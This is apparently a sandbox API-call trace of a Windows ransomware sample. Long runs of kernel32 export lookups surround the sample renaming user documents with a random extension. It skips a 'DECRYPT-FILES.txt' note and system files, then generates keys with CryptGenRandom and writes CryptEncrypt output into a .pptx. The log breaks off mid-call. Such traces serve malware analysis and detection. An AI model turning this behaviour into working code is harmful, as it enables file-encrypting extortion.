lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.714] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.714] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.714] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.714] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.714] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.714] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.714] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.714] lstrlenA (lpString="DELETEATOM") returned 10 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.714] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.714] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.714] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.714] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.714] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.714] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.714] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.714] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.714] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.714] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.714] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.715] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.715] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.715] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.715] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.715] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.715] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.715] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.715] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.715] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.715] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.715] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.715] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.715] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.715] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.715] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.715] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.715] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.716] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.716] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.716] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.716] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.716] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.716] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.716] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.716] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.716] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.716] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.716] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.716] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.716] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.716] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods") returned 57 [0083.716] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods.lZvocw") returned 64 [0083.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_dutxfwisoa_.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_DUtxFwiSOA_.ods.lZvocw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_dutxfwisoa_.ods.lzvocw"), dwFlags=0x0) returned 1 [0083.717] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.717] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.718] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.718] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c665660, ftCreationTime.dwHighDateTime=0x1d57f63, ftLastAccessTime.dwLowDateTime=0xae2f6a50, ftLastAccessTime.dwHighDateTime=0x1d57589, ftLastWriteTime.dwLowDateTime=0xae2f6a50, ftLastWriteTime.dwHighDateTime=0x1d57589, nFileSizeHigh=0x0, nFileSizeLow=0x4a01, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Vab-9jdPOdBqrE6M.pptx", cAlternateFileName="0VAB-9~1.PPT")) returned 1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="DECRYPT-FILES.txt") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="autorun.inf") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="boot.ini") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="desktop.ini") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="ntuser.dat") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="iconcache.db") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="bootsect.bak") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="ntuser.dat.log") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="thumbs.db") returned -1 [0083.718] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.pptx", lpString2="Bootfont.bin") returned -1 [0083.718] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.pptx") returned 22 [0083.718] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0083.718] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0083.718] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0083.718] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0083.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.718] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.pptx") returned 22 [0083.718] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.718] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="0Vab-9jdPOdBqrE6M.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx" [0083.718] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0Vab-9jdPOdBqrE6M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vab-9jdpodbqre6m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.719] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=18945) returned 1 [0083.719] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.719] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.719] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.719] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.719] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.720] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.720] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.720] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.721] CloseHandle (hObject=0x414) returned 1 [0083.721] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.721] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.722] CloseHandle (hObject=0x0) returned 0 [0083.722] CloseHandle (hObject=0x410) returned 1 [0083.722] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.722] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.722] GetTickCount () returned 0x114d662 [0083.722] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.723] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.723] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.723] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.723] lstrlenA (lpString="kernel32.dll") returned 12 [0083.723] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.723] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.723] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.723] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.723] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.724] lstrlenA (lpString="ADDATOMA") returned 8 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.724] lstrlenA (lpString="ADDATOMW") returned 8 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.724] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.724] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.724] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.724] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.724] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.724] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.724] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.724] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.724] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.724] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.724] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.724] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.724] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.724] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.724] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.724] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.724] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.725] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.725] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.725] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.725] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.725] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.725] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.725] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.725] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.725] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.725] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.725] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.725] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.725] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.725] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.725] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.725] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.725] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.725] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.725] lstrcpyA (in: lpString1=0x3f2d468, 